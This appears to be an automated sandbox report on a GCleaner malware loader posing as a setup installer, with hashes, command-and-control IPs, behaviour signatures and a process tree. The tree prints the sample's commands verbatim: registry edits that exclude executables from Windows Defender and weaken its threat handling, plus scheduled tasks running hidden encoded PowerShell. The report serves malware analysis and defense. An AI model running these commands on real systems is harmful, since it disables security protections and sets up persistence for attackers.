Analysis
-
max time kernel
511s -
max time network
405s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
-
submitted
29-03-2023 18:24
General
-
Target
setup_kNf5DvMN.exe
-
Size
4.7MB
-
MD5
97e1d6bc473047605f457d00caf6fba4
-
SHA1
2fb78991c0d0a530c51cd6267ca84bafbb7ef803
-
SHA256
aaf8fab4d6540823ea06e4d9e35291f82b263eaf612af980912795f403b83712
-
SHA512
99aea6c186c12ffbfa96c57a5b38d6fb107da8946d5177b0ea3d52bf9b0648e65c0ee140c10d026503bcfc88cc109842a990c6801320974f4cf4b43d6d8a26bf
-
SSDEEP
98304:ntjiPbNRFsA0Aweg23ThghzHcnxnPpJ0y8dcOtFLKTWhliJyDPFhn:pWbrFL0FegEtMLcnxnPBPscWT2y7Fhn
Malware Config
Extracted
gcleaner
85.31.45.39
85.31.45.250
85.31.45.251
85.31.45.88
Signatures
-
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
-
Blocklisted process makes network request 1 IoCs
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 13 IoCs
-
Loads dropped DLL 8 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks for any installed AV software in registry 1 TTPs 10 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Drops file in System32 directory 28 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 48 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Kills process with taskkill 1 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 39 IoCs
-
Suspicious use of SendNotifyMessage 37 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_kNf5DvMN.exe"C:\Users\Admin\AppData\Local\Temp\setup_kNf5DvMN.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-TEQN5.tmp\is-P9QC6.tmp"C:\Users\Admin\AppData\Local\Temp\is-TEQN5.tmp\is-P9QC6.tmp" /SL4 $B0052 "C:\Users\Admin\AppData\Local\Temp\setup_kNf5DvMN.exe" 4602124 532482⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" helpmsg 233⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 helpmsg 234⤵
-
C:\Program Files (x86)\ImageComparer\IC329.exe"C:\Program Files (x86)\ImageComparer\IC329.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1340 -s 8684⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1340 -s 8884⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1340 -s 1404⤵
- Program crash
-
C:\Program Files (x86)\ImageComparer\IC329.exe"C:\Program Files (x86)\ImageComparer\IC329.exe" 5826013cd90e1950316750759f55d7553⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 8524⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 8604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 8844⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 10524⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 10924⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 10564⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 10524⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 12524⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 12604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 12044⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 9684⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 12444⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 14804⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 13204⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 17564⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 13164⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 15164⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 19964⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 17804⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 8404⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 20244⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 17564⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 18364⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 18924⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 17604⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 20724⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 20084⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 20884⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 8404⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 20964⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\zw5VYyXN\8Q8Ynu6h.exeC:\Users\Admin\AppData\Local\Temp\zw5VYyXN\8Q8Ynu6h.exe /m SUB=5826013cd90e1950316750759f55d7554⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-ABNKO.tmp\is-8Q8MT.tmp"C:\Users\Admin\AppData\Local\Temp\is-ABNKO.tmp\is-8Q8MT.tmp" /SL4 $160054 "C:\Users\Admin\AppData\Local\Temp\zw5VYyXN\8Q8Ynu6h.exe" 1378502 52736 /m SUB=5826013cd90e1950316750759f55d7555⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" helpmsg 206⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 helpmsg 207⤵
-
C:\Users\Admin\AppData\Local\Temp\is-JJ3V3.tmp\FileDate329\FileDate329.exe"C:\Users\Admin\AppData\Local\Temp\is-JJ3V3.tmp\FileDate329\FileDate329.exe" /m SUB=5826013cd90e1950316750759f55d7556⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "FileDate329.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\is-JJ3V3.tmp\FileDate329\FileDate329.exe" & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "FileDate329.exe" /f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\E7nawvlM\NiLRDjNG6iWIRznGxB.exeC:\Users\Admin\AppData\Local\Temp\E7nawvlM\NiLRDjNG6iWIRznGxB.exe /S /site_id=6906894⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&6⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:327⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:647⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&6⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:647⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:327⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ghgJytiJP" /SC once /ST 01:02:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ghgJytiJP"5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ghgJytiJP"5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bIIVPNBwJtQvPFWhKj" /SC once /ST 20:27:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\mlDSIyJieHcCVqF\ReHoYmc.exe\" DF /site_id 690689 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 21404⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 21284⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\FMqcuseo\66mYpuDkR.exeC:\Users\Admin\AppData\Local\Temp\FMqcuseo\66mYpuDkR.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-TNCIS.tmp\is-CK8P0.tmp"C:\Users\Admin\AppData\Local\Temp\is-TNCIS.tmp\is-CK8P0.tmp" /SL4 $302DC "C:\Users\Admin\AppData\Local\Temp\FMqcuseo\66mYpuDkR.exe" 1903931 517125⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Program Files (x86)\BKngBackup\SyncBackupShell.exe"C:\Program Files (x86)\BKngBackup\SyncBackupShell.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 21364⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 21284⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 17564⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 18844⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 20524⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 20004⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 20804⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 21324⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 20404⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 17684⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 20804⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 18444⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 1404⤵
- Program crash
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" pause ImageComparer3293⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 pause ImageComparer3294⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1340 -ip 13401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1340 -ip 13401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1340 -ip 13401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2884 -ip 28841⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2884 -ip 28841⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2884 -ip 28841⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2884 -ip 28841⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2884 -ip 28841⤵
-
C:\Users\Admin\Documents\setup_2.exe_id25860365.exe"C:\Users\Admin\Documents\setup_2.exe_id25860365.exe"1⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2884 -ip 28841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2884 -ip 28841⤵
-
C:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\mlDSIyJieHcCVqF\ReHoYmc.exeC:\Users\Admin\AppData\Local\Temp\iBJlqjuWMGEsSFWXw\mlDSIyJieHcCVqF\ReHoYmc.exe DF /site_id 690689 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t 